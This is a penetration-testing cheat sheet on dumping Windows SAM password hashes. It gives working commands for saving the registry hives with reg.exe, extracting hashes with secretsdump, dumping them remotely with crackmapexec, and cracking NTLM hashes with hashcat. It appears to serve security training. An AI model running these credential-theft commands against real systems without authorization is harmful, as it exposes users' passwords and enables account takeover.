Attacking SAM
The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system containing user names and passwords.
Locations
The files that are relevant for the SAM are placed in the Windows Registry.
| Registry Hive | Description |
|---|---|
| hklm\sam | Contains the hashes associated with local account passwords. |
| hklm\system | Contains the system bootkey, which is used to encrypt the SAM database. |
| hklm\security | Contains cached credentials for domain accounts. |
Copy Registry hives with reg.exe
To copy the SAM database you need to have at least local administrator privilege.
- Use
reg.exeto savehklm\sam.
1
reg.exe save hklm\sam C:\sam.save
2. Use reg.exe to save hklm\system.
1
reg.exe save hklm\system C:\system.save
3. 1. Use reg.exe to save hklm\security.
1
reg.exe save hklm\security C:\security.save
Dumping hashes with secretsdump
!!! note
1
The boot key is mandatory. Dumping those hashes without the boot key is not possible, because the boot key is used to encrypt & decrypt the SAM database.
Copy the files to the attacking machine and start cracking with secretsdump. The hashes are encrypted with the bootkey which is located in the hklm\system hive. Without the bootkey, the password cannot be decrypted.
1
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL
The hashes are being dunped in the following format:
1
uid:rid:lmhash:nthash
Dumping SAM remotely
The hashes from the SAM database can also be dumped remotely with crackmapexec. The variables $ip, $username, and $password needs to be replaces with the actual values. You need at least to have credentials that have local admin privileges to the victim machine.
1
crackmapexec smb $ip --local-auth -u $username -p $password --lsa
Cracking hashes with hascat
After dumping the hashes, hashcat can be used to crack the hashes to reveal the plain-text passwords.
1
sudo hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
-m 1000=> Set hashtype to NTLM hashes.